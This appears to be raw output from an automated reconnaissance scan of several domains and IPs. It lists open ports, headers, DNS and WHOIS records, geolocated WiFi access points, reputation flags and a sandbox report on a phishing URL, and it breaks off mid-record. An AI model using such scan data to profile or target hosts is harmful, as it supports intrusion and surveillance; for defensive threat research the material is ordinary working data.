00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b02e965983224a-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:21:17 BGP AS Membership No Censys 0 0 2 0 None 13335 188.114.96.1 2022-12-18 00:02:47 SSL Certificate - Issued to No CertSpotter 1 0 1 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com rasputain.fr 2022-12-18 00:10:04 BGP AS Membership No URLScan.io 0 0 1 0 None 3215 rasputain.fr 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pannet-24 (Net ID: 00:01:8E:DA:59:C4) 37.780462,-122.390564 2022-12-18 00:38:04 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.1] https://www.virustotal.com/en/ip-address/188.114.96.1/information/ 188.114.96.0/24 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2096 172.67.169.215 2022-12-18 00:06:33 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.0:8080 188.114.96.0 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf:2020/copy 20.226.83.185 2022-12-18 00:20:39 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-20T03:28:00.922Z", "ip": "20.195.209.219", "location_updated_at": "2022-12-18T00:20:36.645449Z", "autonomous_system_updated_at": "2022-12-18T00:20:36.645449Z", "location": {"province": "Sao Paulo", "city": "Campinas", "country": "Brazil", "coordinates": {"latitude": -22.9035, "longitude": -47.0565}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "BR", "timezone": "America/Sao_Paulo", "continent": "South America"}, "services": [], 
"autonomous_system": {"bgp_prefix": "20.192.0.0/10", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 20.195.209.219 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None rasputain.fr. 86400 IN NS garrett.ns.cloudflare.com. rasputain.fr. 86400 IN NS journey.ns.cloudflare.com. rasputain.fr 2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.194 34.149.204.188 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad04409be52d85-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:20:42 Raw Data from RIRs No LeakIX 0 0 3 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.48.102', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'l9explore', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'b68e7b05331a65e13fa47d4d1ccc539e4b750c53ebe4c7967f43ffceaf6c8acc', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, 
u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'ip4scout', u'l9tcpid', u'l9explore'], u'http': {u'status': 500, u'title': u'', u'url': u'/login.action', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': None, u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html; charset=UTF-8\r\nCache-Control: no-cache, private\r\ndate: Tue, 01 Nov 2022 19:15:57 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Length: 4558\r\nConnection: close\r\n\r\n

Whoops, looks like something went wrong.

', u'time': u'2022-11-01T19:17:27.805090985Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.48.102', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7ca5e9923acf1afc15f62672901ded74cf8b4652db64aad06764aad067', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'Content-Type: text/html; charset=UTF-8\r\nCache-Control: no-cache, private\r\ndate: Wed, 16 Nov 2022 22:25:18 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Length: 4558\r\nConnection: close\r\n', u'time': u'2022-11-16T22:25:14.47739357Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'81.88.48.102', 
u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7ca5e9923acf1afc15f62672901ded74cf8b4652db64aad06764aad067', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256', u'jarm': u'29d29d00029d29d00029d29d29d29dcb09dd549309271837f87ac5dad15fa7', u'certificate': {u'domain': [u'*.amen.fr', u'amen.fr'], u'cn': u'*.amen.fr', u'valid': False, u'not_after': u'2023-06-12T23:59:59Z', u'key_size': 2048, u'issuer_name': u'Sectigo RSA Organization Validation Secure Server CA', u'fingerprint': u'60aa004a4b55005e2546d60d529e3b0b317a23042779c1fd51c002627829d88c', u'key_algo': u'RSA', u'not_before': u'2022-06-03T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.2'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'Content-Type: text/h 81.88.48.102 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:8080 104.21.7.179 2022-12-18 00:29:09 Similar Domain - Whois No 
Whois 0 0 2 0 None Domain name: plague.uk Data validation: Nominet was able to match the registrant's name and address against a 3rd party data source on 31-Aug-2022 Registrar: Mr C Davies t/a parth.cymru [Tag = PARTH] URL: http://parth.cymru Relevant dates: Registered on: 04-Mar-2019 Expiry date: 04-Mar-2024 Last updated: 02-Feb-2022 Registration status: Registered until expiry date. Name servers: ns1.bodis.com ns2.bodis.com WHOIS lookup made at 00:29:09 18-Dec-2022 -- This WHOIS information is provided for free by Nominet UK the central registry for .uk domain names. This information and the .uk WHOIS are: Copyright Nominet UK 1996 - 2022. You may not access the .uk WHOIS or use any data from it except as permitted by the terms of use available in full at https://www.nominet.uk/whoisterms, which includes restrictions on: (A) use of the data for advertising, or its repackaging, recompilation, redistribution or reuse (B) obscuring, removing or hiding any or all of this notice and (C) exceeding query rate or volume limits. The data is provided on an 'as-is' basis and may lag behind the register. Access may be withdrawn or restricted at any time. 
plague.uk 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:87:91) 37.780462,-122.390564 2022-12-18 00:16:59 Web Content Type No Web Spider 0 0 4 0 None text/css http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/master.css?v=1.7.0 2022-12-18 00:26:53 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.pro plague.fun 2022-12-18 00:21:03 Web Server No Web Server Identifier 0 0 3 0 None Werkzeug/2.2.2 Python/3.9.11 {"date": "Sun, 18 Dec 2022 00:07:17 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) 37.7803446,-122.3906132 2022-12-18 00:08:10 Netblock Membership No RIPE 2 0 1 0 None 137.117.0.0/16 137.117.157.128 2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Let's Encrypt,CN=R3 plague.fun 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:443 104.21.7.179 2022-12-18 00:13:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@1api.net Domain Name: y.wtf Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registry Expiry Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396850 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: xTom GmbH Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE 
Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. 
provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: Y.WTF Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registrar Registration Expiration Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396x850 Domain Status: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: contact via https://www.1api.net/send-message/y.wtf/registrant Registry Admin ID: Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: contact via https://www.1api.net/send-message/y.wtf/admin Registry Tech ID: Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED 
FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: contact via https://www.1api.net/send-message/y.wtf/tech Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. ; This data is provided for information purposes, and to assist persons ; obtaining information about or related to domain name registration ; records. We do not guarantee its accuracy. ; By submitting a WHOIS query, you agree that you will use this data ; only for lawful purposes and that, under no circumstances, you will ; use this data to ; 1) allow, enable, or otherwise support the transmission of mass ; unsolicited, commercial advertising or solicitations via E-mail ; (spam); or ; 2) enable high volume, automated, electronic processes that apply ; to this WHOIS server. ; These terms may be changed without prior notice. ; By submitting this query, you agree to abide by this policy. 
2022-12-18 00:09:49 Co-Hosted Site No HackerTarget 0 0 2 0 None awf03.com 172.67.147.230 2022-12-18 00:26:11 Malicious IP Address Yes MetaDefender 0 1 2 0 None avira.com [20.226.83.185] 20.226.83.185 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None grasshopper2 (Net ID: 00:01:38:5A:88:28) 37.7803446,-122.3906132 2022-12-18 00:22:01 Physical Location No Censys 0 0 2 0 None United States, North America 2a06:98c1:3121::1 2022-12-18 00:12:39 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'25', u'country_tld': u'.it', u'ip': u'81.88.52.232', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Bergamo', u'network': u'81.88.52.0/23', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 45.7049, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'24123', u'asn': u'AS39729', u'country': u'IT', u'region': u'Lombardy', u'longitude': 9.6698, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 81.88.52.232 2022-12-18 00:06:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://portalseguro.jdavivienda.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "172.253.122.95:443"\n "142.251.163.94:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalseguro.jdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_a80_IE_EarlyTabStart_0xb94_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a80_IESQMMUTEX_0_519"\n "IsoScope_a80_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2688"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a80_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a80_ConnHashTable<2688>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a80_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalseguro.jdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "YPIJJ971.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YPIJJ971.txt]- [targetUID: 00000000-00002688]\n Dropped file: "AI051CXT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AI051CXT.txt]- [targetUID: 00000000-00002688]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF9F132CAB72D9C597.TMP" has type "data"- Location: [%TEMP%\\~DF9F132CAB72D9C597.TMP]- [targetUID: 00000000-00002688]\n "YPIJJ971.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YPIJJ971.txt]- [targetUID: 00000000-00002688]\n "~DF1675A0CFA222883C.TMP" has type "data"- Location: [%TEMP%\\~DF1675A0CFA222883C.TMP]- [targetUID: 00000000-00002688]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "_0DA7B08D-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "AI051CXT.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\AI051CXT.txt]- [targetUID: 00000000-00002688]\n "_177B0170-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF03727103672B0498.TMP" has type "data"- Location: [%TEMP%\\~DF03727103672B0498.TMP]- [targetUID: 00000000-00002688]\n "zYXgKVElMYYaJe8bpLHnCwDKhdHeEw_1_.woff" has type "Web Open Font Format TrueType length 22912 version 1.1"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF1E505D7FA00BDD24.TMP" has type "data"- Location: [%TEMP%\\~DF1E505D7FA00BDD24.TMP]- [targetUID: 00000000-00002688]\n "RecoveryStore._0DA7B08B-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_BDAF2F6C-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD2F78EE99E0F6CB3.TMP" has type "data"- Location: [%TEMP%\\~DFD2F78EE99E0F6CB3.TMP]- [targetUID: 00000000-00002688]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00002688]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://portalseguro.jdavivienda.repl.co/"\n Pattern match: "http://portalseguro.jdavivienda.repl.co"\n Heuristic match: "portalseguro.jdavivienda.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, 
u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'13/90 Antivirus vendors marked sample as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'13/90 reputation engines marked "http://portalseguro.jdavivienda.repl.co" as malicious (14% detection rate)\n 13/90 reputation engines marked "http://portalseguro.jdavivienda.repl.co/" as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'13/90 Antivirus vendors marked sample as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'636546f1c8821122f4144205', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': 
